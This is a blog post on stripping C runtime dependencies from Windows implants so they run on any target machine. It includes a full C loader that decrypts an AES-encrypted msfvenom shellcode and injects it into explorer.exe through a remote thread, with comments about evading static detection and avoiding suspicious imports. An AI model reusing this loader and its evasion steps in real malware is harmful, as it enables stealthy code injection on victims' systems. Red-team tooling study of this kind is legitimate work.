I’m almost 90% complete drafting this post when I came across this talk by @rad9800 that discusses the same topic. I’m still publishing this anyhow because I don’t want my efforts to go to waste and this post contains some ideas not mentioned in the talk.
There’s no greater feeling when the malware (or any project/tool) you’re developing works as expected. Until suddenly you realized it only works on your dev machine but not on any other machine.
Here’s an example of what I mean. This code is a commonly used template by malware in which the payload is AES-encrypted (using tiny-AES-c in this case) to avoid static detection. The payload gets decrypted during execution and injected into a remote target process’ memory space.
#include <Windows.h>
#include <stdio.h>
#include "include/aes.hpp"
int main()
{
// msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f c
unsigned char shellcode[] = "\x9c\xad\x1d\x5b\x52\x35\xdf\x9e\x15\xc3\xa4\x94\xb0\xf6\xd5\x1a\x14\x82\x9b\xc2\xc5\x40\x9e\x03\x45\xdf\x0d\x85\xfc\xff\xc2\xf7\x37\x84\x4b\xa1\x5f\x07\xa3\xf5\xd5\xe3\x54\xe4\x33\x84\x24\xf9\xaf\xbd\xc1\x53\xc9\x87\x4c\xc2\x12\xc7\x24\x6c\x22\xe9\x41\xb4\x47\x9c\xfa\x4c\x20\x8f\x57\x17\x29\x00\x10\x40\x83\xff\xc8\xfe\xa5\x87\x1f\xfd\xec\x30\x72\x07\x71\x59\xf8\x05\xda\x49\x12\xdf\x0a\xc5\xb8\x65\x99\x65\xfa\x5f\xc4\xc3\x8b\x40\x1e\xbe\xf1\x55\xde\x4f\x3a\x65\x2f\x14\xcc\x29\x9d\x7d\x17\xd0\x55\x99\x9e\xc3\x0d\xd7\xbb\xa3\x00\x34\x79\x32\xbe\x16\x66\xf6\xa4\xbc\xda\x40\x06\x7b\x8d\x56\x79\x6b\x21\x79\xd5\xf9\x55\x52\xe2\xd5\x8c\x34\xfd\x1c\x26\xc2\xf5\xd4\x6b\xca\xc3\x74\x91\x9d\xe4\xa2\xf4\x71\x42\x90\x2c\x6a\x11\x66\xf8\x56\x8f\x3c\x26\xa4\x27\x89\x6f\xc2\x02\x48\x53\xed\x08\x32\xa6\x48\x0f\x9a\x39\x0e\x5d\x38\xb4\xa2\x30\x6d\x27\x94\x80\x8c\x06\xa8\x86\x5f\x0b\xda\x44\x83\x51\x55\xfc\xb9\xe2\xcb\xbc\x95\xc8\xd6\x18\xd7\x1b\x04\x3d\xfb\x53\x9b\x57\xa8\xb2\xab\xe7\x27\x3b\xd2\xcb\x53\x20\x11\xcc\x5f\xaf\x31\xcf\xba\x83\xd7\xc7\xa8\xf7\x0c\x78\x6d\x7f\x46\x99\xd7\x33\x23";
SIZE_T shellcodeSize = sizeof(shellcode);
unsigned char key[] = "Captain.MeeloIsTheSuperSecretKey";
unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58\x51\x11\x47\xa5\x98";
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, key, iv);
AES_CBC_decrypt_buffer(&ctx, shellcode, shellcodeSize);
// PID of explorer.exe
DWORD pid = 6028;
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
printf("[+] Handle obtained: 0x%p\n", hProcess);
PVOID baseAddress = NULL;
baseAddress = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
printf("[+] Memory allocated: 0x%p\n", baseAddress);
WriteProcessMemory(hProcess, baseAddress, shellcode, shellcodeSize, NULL);
printf("[+] Memory written: %zu bytes\n", shellcodeSize);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)baseAddress, NULL, 0, NULL);
printf("[+] Thread created: 0x%p\n", hThread);
printf("[+] Payload executed!");
}
When run on the dev machine, the compiled code works as expected.
But when the same binary gets executed on a different machine, it throws the following error.
Runtime Libraries
What the heck is VCRUNTIME140.dll
? This DLL is a runtime library used by Microsoft Visual Studio which consists of functions/codes a program needs in order to work during run time.
Per Microsoft’s documentation:
The vcruntime library contains Visual C++ CRT implementation-specific code, such as exception handling and debugging support, runtime checks and type information, implementation details and certain extended library functions.
Looking at the binary’s IAT (Import Address Table), several functions are imported from VCRUNTIME140.dll
and api-ms-win-crt-*.dll
DLLs.
When the binary is executed, the OS loads the required libraries (hence called “runtime library”) in the process’ address space and then resolves the relevant functions used by the program.
Why Do We Care?
During an engagement, we have no idea whether the libraries required by your implant/malware are installed on the target system. Well, if you already have access to the target machine then you can do an enumeration first. However, it is a good idea to assume the target system does not have the required libraries. Doing so will allow us to develop a program that works in any system.
The Solutions
How do we get around it and remove the dependencies? Here are some of the solutions I discovered as I encounter the same obstacle.
Install What’s Missing
One of the easiest solutions is to install Microsoft Visual C++ Redistributable. However, it is not recommended as making changes to a target system, especially installing software, is bad practice.
When Googling this issue, the solution provided by some web pages instructs the reader to download the missing DLL hosted on their server. This is a big NO as the legitimacy of the hosted file is unknown, and this could put the target/client’s system in a riskier scenario.
Statically Link ‘Em
Getting rid of runtime libraries can be done by static linking them during compile time. With this approach, worrying about the missing libraries on the target system goes away as they are already “bundled” in the binary. Hence, the chance the program will work on any system is highly probable.
Static linking of the required libraries is easy. In Visual Studio, go to the project properties and set the value of the Runtime Library
property to Multi-threaded (/MT)
.
Since libraries are “bundled” into the executable, the following drawbacks can be observed:
- Bloated binary: Here’s a comparison showing a difference of more than 100KB in file size when using static linking.
- More IAT entries: Static linking results in more imports (78 in this case) compared to dynamic linking (49 in total).
Manually Remove ‘Em
To eliminate any dependencies, tell the linker to exclude all default libraries from the list of libraries it searches. This is done by setting the /NODEFAULTLIB
linker option.
However, compilation with the /NODEFAULTLIB
linker option set causes the following error.
What happened? Let’s first discuss the highlighted item.
To start the analysis, set a breakpoint in main()
, debug the code, and look at the call stack. Here, it shows main()
is not the entry point of the program. In fact, the execution begins by invoking the mainCRTStartup()
function, which is the entry point of the C runtime library and is responsible for the initialization of the memory manager, file I/O, etc. Then the main()
function will eventually be called.
Changing the Program’s Entry Point
If main()
is not the actual entry point, then just “force” the compiler to use main()
as the entry point. To do this, add the directive #pragma comment(linker, "/ENTRY:main")
in the above code or set the Entry Point
property to main
.
Other function names (e.g.,
entry()
) can be used as the entry point and having amain()
function in the code is optional.
The other method does not involve changing the entry point, but having our version of the mainCRTStartup()
function. Since mainCRTStartup()
is the real entry point, then simply put the code inside it. Using this approach, the updated code would look like this.
#include <Windows.h>
#include <stdio.h>
#include "include/aes.hpp"
void __stdcall mainCRTStartup()
{
[THE_BODY_CONTAINS_THE_SAME_CODE_AS_ABOVE]
}
int main()
was simply change tovoid __stdcall mainCRTStartup()
. Note that the rest of this post uses this method.
Using either method, compiling the updated code returns fewer errors. Specifically, the error message LNK2001 unresolved external symbol mainCRTStartup
is gone.
Disabling Security Check
To address the error LNK2001 unresolved external symbol __security_check_cookie
, simply tell the compiler to stop checking for buffer overruns. To do this, set the Security Check
property to Disable Security Check (/GS-)
.
I won’t go into the details about the
/GS
compiler option, but here’s a reference you can read.
After compiling the updated program, only two errors were left.
Removing <stdio.h>
The remaining errors are related to the included library stdio.h
, which contains functions for file I/O operations. The base code includes this library to be able to use the printf()
function. If this library is removed and all lines containing the printf()
function are commented out, then the remaining errors are gone.
[![Removing
When the updated code gets compiled and the binary is executed on another system, it works and the initial error related to VCRUNTIME140.dll
didn’t pop out.
Looking again at the binary’s IAT, the number of imports is reduced to 4 and only contains the actual WinAPI used within the code.
The file size is also reduced to only 7KB, which is smaller than the original size of 15KB.
Build Your Own
Custom printf()
But what if printf()
is necessary for our program? One approach is to have a custom printf()
function. Here’s an example which utilizes Windows API.
void my_printf(const char* pszFormat, ...) {
char buf[1024];
va_list argList;
va_start(argList, pszFormat);
wvsprintfA(buf, pszFormat, argList);
va_end(argList);
DWORD done;
WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), buf, strlen(buf), &done, NULL);
}
This code was taken from here, so credits to the author.
When using the above my_printf()
code, one must take into account the additional DLL (user32.dll
due to the use of wvsprintfA()
) the binary relies on. Since the program is a console application (no GUI/window), the use of functions from user32.dll
could be a red flag.
How to write a print function without depending on user32.dll
then? Luckily, kernelbase.dll
has wprintf()
as one of its exported functions.
However, directly using it will result in a compilation error. A workaround is to resolve wprintf()
dynamically. Here’s the updated code showcasing how to do it.
#include <Windows.h>
#include "include/aes.hpp"
typedef int (*my_wprintf)(
const wchar_t* format,
...
);
void __stdcall mainCRTStartup()
{
// Resolve wprintf()
HMODULE hKernelBase = GetModuleHandleW(L"kernelbase.dll");
my_wprintf wprintf = (my_wprintf)GetProcAddress(hKernelBase, "wprintf");
// msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f c
unsigned char shellcode[] = "\x9c\xad\x1d\x5b\x52\x35\xdf\x9e\x15\xc3\xa4\x94\xb0\xf6\xd5\x1a\x14\x82\x9b\xc2\xc5\x40\x9e\x03\x45\xdf\x0d\x85\xfc\xff\xc2\xf7\x37\x84\x4b\xa1\x5f\x07\xa3\xf5\xd5\xe3\x54\xe4\x33\x84\x24\xf9\xaf\xbd\xc1\x53\xc9\x87\x4c\xc2\x12\xc7\x24\x6c\x22\xe9\x41\xb4\x47\x9c\xfa\x4c\x20\x8f\x57\x17\x29\x00\x10\x40\x83\xff\xc8\xfe\xa5\x87\x1f\xfd\xec\x30\x72\x07\x71\x59\xf8\x05\xda\x49\x12\xdf\x0a\xc5\xb8\x65\x99\x65\xfa\x5f\xc4\xc3\x8b\x40\x1e\xbe\xf1\x55\xde\x4f\x3a\x65\x2f\x14\xcc\x29\x9d\x7d\x17\xd0\x55\x99\x9e\xc3\x0d\xd7\xbb\xa3\x00\x34\x79\x32\xbe\x16\x66\xf6\xa4\xbc\xda\x40\x06\x7b\x8d\x56\x79\x6b\x21\x79\xd5\xf9\x55\x52\xe2\xd5\x8c\x34\xfd\x1c\x26\xc2\xf5\xd4\x6b\xca\xc3\x74\x91\x9d\xe4\xa2\xf4\x71\x42\x90\x2c\x6a\x11\x66\xf8\x56\x8f\x3c\x26\xa4\x27\x89\x6f\xc2\x02\x48\x53\xed\x08\x32\xa6\x48\x0f\x9a\x39\x0e\x5d\x38\xb4\xa2\x30\x6d\x27\x94\x80\x8c\x06\xa8\x86\x5f\x0b\xda\x44\x83\x51\x55\xfc\xb9\xe2\xcb\xbc\x95\xc8\xd6\x18\xd7\x1b\x04\x3d\xfb\x53\x9b\x57\xa8\xb2\xab\xe7\x27\x3b\xd2\xcb\x53\x20\x11\xcc\x5f\xaf\x31\xcf\xba\x83\xd7\xc7\xa8\xf7\x0c\x78\x6d\x7f\x46\x99\xd7\x33\x23";
SIZE_T shellcodeSize = sizeof(shellcode);
unsigned char key[] = "Captain.MeeloIsTheSuperSecretKey";
unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58\x51\x11\x47\xa5\x98";
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, key, iv);
AES_CBC_decrypt_buffer(&ctx, shellcode, shellcodeSize);
// PID of explorer.exe
DWORD pid = 6028;
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
wprintf(L"[+] Handle obtained: 0x%p\n", hProcess);
PVOID baseAddress = NULL;
baseAddress = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
wprintf(L"[+] Memory allocated: 0x%p\n", baseAddress);
WriteProcessMemory(hProcess, baseAddress, shellcode, shellcodeSize, NULL);
wprintf(L"[+] Memory written: %zu bytes\n", shellcodeSize);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)baseAddress, NULL, 0, NULL);
wprintf(L"[+] Thread created: 0x%p\n", hThread);
wprintf(L"[+] Payload executed!");
}
Now, the dependency with user32.dll
has been removed.
Custom CRT
What about the other standard functions such as memcpy()
, memset()
, strcmp()
, rand()
, etc.? One way is to write custom implementations of these functions. Several devs have done this so the codes are just one Google search away. Here’s an example for memcpy()
and memset()
.
void *memcpy (void *dest, const void *src, size_t len)
{
char *d = dest;
const char *s = src;
while (len--)
*d++ = *s++;
return dest;
}
void *memset (void *dest, int val, size_t len)
{
unsigned char *ptr = dest;
while (len-- > 0)
*ptr++ = val;
return dest;
}
Here are some repos that could be useful. These contain code snippets that can be used as an alternative to the C runtime library.
Go With WinAPI
The other method is to simply use the WinAPI counterpart of the function. For example, instead of using malloc()
and wcscmp()
, WinAPI has VirtualAlloc()
and StrCmpW()
.
This image was taken from this discussion, so credits to the owner/poster.
Conclusion
Your code most likely varies from the code presented here, so don’t expect everything discussed in this post will work in your project. However, with this rough guide, I hope it will alleviate some of the headaches you’re going to have should you decide to remove any CRT dependencies in your program.
I’m not a pro at programming and I only shared what I learned. If you identify any mistakes, please let me know so we can correct them.